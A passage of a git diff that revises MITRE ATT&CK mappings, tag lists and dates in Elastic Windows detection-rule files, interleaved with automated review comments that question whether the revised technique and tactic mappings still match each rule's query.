@@ -54,7 +54,18 @@ references = [ risk_score = 47 rule_id = "c18975f5-676c-4091-b626-81e8938aa2ee" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -107,36 +118,19 @@ registry where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.015" -name = "Component Object Model Hijacking" -reference = "https://attack.mitre.org/techniques/T1546/015/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1546.015" -name = "Component Object Model Hijacking" -reference = "https://attack.mitre.org/techniques/T1546/015/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_right_to_left_override.toml b/rules/windows/defense_evasion_right_to_left_override.toml index b51b6537de2..2b351c4f41b 100644 --- a/rules/windows/defense_evasion_right_to_left_override.toml +++ b/rules/windows/defense_evasion_right_to_left_override.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
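Review bot: The two prior `T1546.015` Component Object Model Hijacking entries are replaced by the generic `T1112` Modify Registry and `T1562` Impair Defenses (no sub-technique) under Defense Evasion, so the rule loses its only technique-specific mapping; since the hunk header shows a `registry where ... event.action != "deletion"` query, it seems worth keeping `T1546.015` under at least one tactic alongside the new entries, or stating in the PR why COM hijacking no longer fits. The tags hunk above matches the new threat block, so tags and threat are consistent for this file. `T1562` without a sub-technique is also vaguer than the `T1562.001`/`T1562.004` used elsewhere in this patch; if one applies, add it.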
@@ -87,18 +87,36 @@ any where host.os.type == "windows" and event.category in ("file", "process") an [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.002" name = "Right-to-Left Override" reference = "https://attack.mitre.org/techniques/T1036/002/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_sc_sdset.toml b/rules/windows/defense_evasion_sc_sdset.toml index 1bd4d0e93cb..e543bd70b60 100644 --- a/rules/windows/defense_evasion_sc_sdset.toml +++ b/rules/windows/defense_evasion_sc_sdset.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/16" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -65,7 +65,19 @@ references = [ risk_score = 47 rule_id = "5188c68e-d3de-4e96-994d-9e242269446f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -79,31 +91,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml b/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml index e89f301a889..baa9ab7adee 100644 --- a/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml 
+++ b/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -62,7 +62,20 @@ references = ["https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32 risk_score = 47 rule_id = "9aa0e1f6-52ce-42e1-abb3-09657cee2698" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -75,23 +88,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.002" name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_sdelete_like_filename_rename.toml b/rules/windows/defense_evasion_sdelete_like_filename_rename.toml index fdb46fca621..4436cce7568 100644 --- a/rules/windows/defense_evasion_sdelete_like_filename_rename.toml +++ b/rules/windows/defense_evasion_sdelete_like_filename_rename.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] 
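Review bot: The `T1053.002` At entry moves from `TA0003` Persistence to `TA0002` Execution and `T1112` Modify Registry is dropped, so the rule no longer references Persistence at all, even though the hunk header shows a `registry where ... event.type == "change"` query and the file name describes enabling the At protocol, a configuration change rather than an execution event. It is worth confirming that Execution is the intended tactic for `T1053.002` here, or keeping Persistence next to the new `T1562.001` Defense Evasion entry, and noting the rationale in the PR. The tags hunk agrees with the new threat block, so tags and threat are consistent in this file.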
@@ -58,7 +58,20 @@ This rule identifies file name patterns generated by the use of SDelete utility risk_score = 21 rule_id = "5aee924b-6ceb-4633-980e-1bde8cdb40c5" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Impact", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -69,18 +82,31 @@ file where host.os.type == "windows" and event.type == "change" and file.name : [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" - [[rule.threat.technique.subtechnique]] id = "T1070.004" name = "File Deletion" reference = "https://attack.mitre.org/techniques/T1070/004/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml index 007beca6c09..18215c26fe3 100644 
--- a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml +++ b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -64,7 +64,20 @@ references = [ risk_score = 47 rule_id = "b9960fef-82c6-4816-befa-44745030e917" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -86,7 +99,6 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" 
@@ -96,13 +108,32 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" +[[rule.threat.technique.subtechnique]] +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/defense_evasion_suspicious_certutil_commands.toml b/rules/windows/defense_evasion_suspicious_certutil_commands.toml index fb5d81c08d8..d31877d1658 100644 --- a/rules/windows/defense_evasion_suspicious_certutil_commands.toml +++ b/rules/windows/defense_evasion_suspicious_certutil_commands.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] 
@@ -112,7 +112,20 @@ references = [ risk_score = 47 rule_id = "fd70c98a-c410-42dc-a2e3-761c71848acf" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" 
@@ -127,39 +140,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1649" -name = "Steal or Forge Authentication Certificates" -reference = "https://attack.mitre.org/techniques/T1649/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml index 219ae03cc8f..cf9205c5fcc 100644 --- a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml +++ b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/28" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/23" [rule] author = ["Elastic"] 
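Review bot: The certutil rule's mapping is cut to T1140 alone, dropping the T1105 Ingress Tool Transfer and T1649 Steal or Forge Authentication Certificates entries and the matching `Tactic: Command and Control` and `Tactic: Credential Access` tags from the previous hunk. The query (`process where host.os.type == "windows" and event.type == "start" and …`, whose body is outside the hunk) is what determines coverage; if it still matches certutil's file-download and certificate-handling invocations, those two techniques describe behaviour the rule actually alerts on and the `[[rule.threat]]` blocks for TA0011 and TA0006 should stay, with the tactic tags kept in step. If the query was narrowed on purpose, the rule name and description should say so.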
@@ -86,32 +86,15 @@ process where host.os.type == "windows" and event.type == "start" and process.ex [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1127" -name = "Trusted Developer Utilities Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1127/" - -[[rule.threat.technique.subtechnique]] -id = "T1127.001" -name = "MSBuild" -reference = "https://attack.mitre.org/techniques/T1127/001/" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" -[[rule.threat.technique.subtechnique]] -id = "T1218.007" -name = "Msiexec" -reference = "https://attack.mitre.org/techniques/T1218/007/" - [[rule.threat.technique.subtechnique]] id = "T1218.010" name = "Regsvr32" @@ -122,19 +105,18 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -145,7 +127,10 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml index 74f123093a7..30a19f5a7ff 100644 --- a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml 
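Review bot: The mounted-device rule loses the T1127 / T1127.001 MSBuild and T1218.007 Msiexec entries while keeping Mshta, Regsvr32 and Rundll32; only the query (`process where … process.ex…`, truncated before the hunk) can justify which proxy-execution binaries are mapped, so this reads as a manual edit rather than a derivation from the query. If the executable list still includes those two binaries, restore the removed `[[rule.threat.technique.subtechnique]]` blocks; if it no longer does, the rule description should reflect the narrower scope. Leaving `[[rule.threat]]` with no blank line before its first technique and extra blank lines before `[rule.threat.tactic]` also departs from the single-separator layout of the old side.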
+++ b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -64,7 +64,19 @@ references = [ risk_score = 73 rule_id = "acf738b5-b5b2-4acc-bad9-1e18ee234f40" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -83,51 +95,14 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.003" -name = "CMSTP" -reference = "https://attack.mitre.org/techniques/T1218/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.005" -name = "Mshta" -reference = "https://attack.mitre.org/techniques/T1218/005/" +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1218.010" -name = "Regsvr32" -reference = "https://attack.mitre.org/techniques/T1218/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique]] -id = "T1129" -name = "Shared Modules" -reference = "https://attack.mitre.org/techniques/T1129/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml b/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml index e3e3d0d65f1..319f6d4e786 100644 --- a/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml +++ b/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml 
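Review bot: The managed-code host rule's whole T1218 family (CMSTP, Mshta, Regsvr32) and its Execution block (T1047, T1059, T1129, TA0002) are replaced by a single T1055 Process Injection entry, and the previous hunk drops the `Tactic: Execution` tag to match. The rule is a file-event detection (`file where host.os.type == "windows" and event.type != "deletion" and …`, body outside the hunk), and a file-creation signal is an unusual sole basis for a Process Injection mapping; unless the query keys on injection artifacts, the proxy-execution mapping described what the rule observes more accurately. Worth confirming against the query and the rule description before merging, and keeping the tag change in step with whichever mapping is kept.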
@@ -2,7 +2,7 @@ creation_date = "2021/10/11" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [transform] [[transform.osquery]] @@ -103,7 +103,15 @@ references = [ risk_score = 73 rule_id = "2dd480be-1263-4d9c-8672-172928f6789a" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -135,13 +143,26 @@ process where host.os.type == "windows" and event.code == "10" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1106" name = "Native API" reference = "https://attack.mitre.org/techniques/T1106/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_suspicious_scrobj_load.toml b/rules/windows/defense_evasion_suspicious_scrobj_load.toml index 0a146be32cf..8b30df05e2c 100644 --- a/rules/windows/defense_evasion_suspicious_scrobj_load.toml +++ b/rules/windows/defense_evasion_suspicious_scrobj_load.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -94,13 +94,19 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_suspicious_wmi_script.toml b/rules/windows/defense_evasion_suspicious_wmi_script.toml index a429935529b..45706563ed1 100644 --- a/rules/windows/defense_evasion_suspicious_wmi_script.toml +++ b/rules/windows/defense_evasion_suspicious_wmi_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -58,7 +58,16 @@ Windows Management Instrumentation Command-line (WMIC) is a powerful tool for ma risk_score = 47 rule_id = "7f370d54-c0eb-4270-ac5a-9a6020585dc6" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' 
@@ -74,13 +83,26 @@ sequence by process.entity_id with maxspan = 2m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" reference = "https://attack.mitre.org/techniques/T1220/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml index ed4551b154d..2b461a36b16 100644 --- a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml +++ b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] 
@@ -105,7 +105,21 @@ This rule identifies a potential malicious process masquerading as `Zoom.exe` or risk_score = 47 rule_id = "97aba1ef-6034-4bd3-8c1a-1e0996b27afa" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" 
@@ -117,23 +131,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml index c61e96383d9..5c5acb3734e 100644 --- a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml +++ b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml @@ -2,7 +2,7 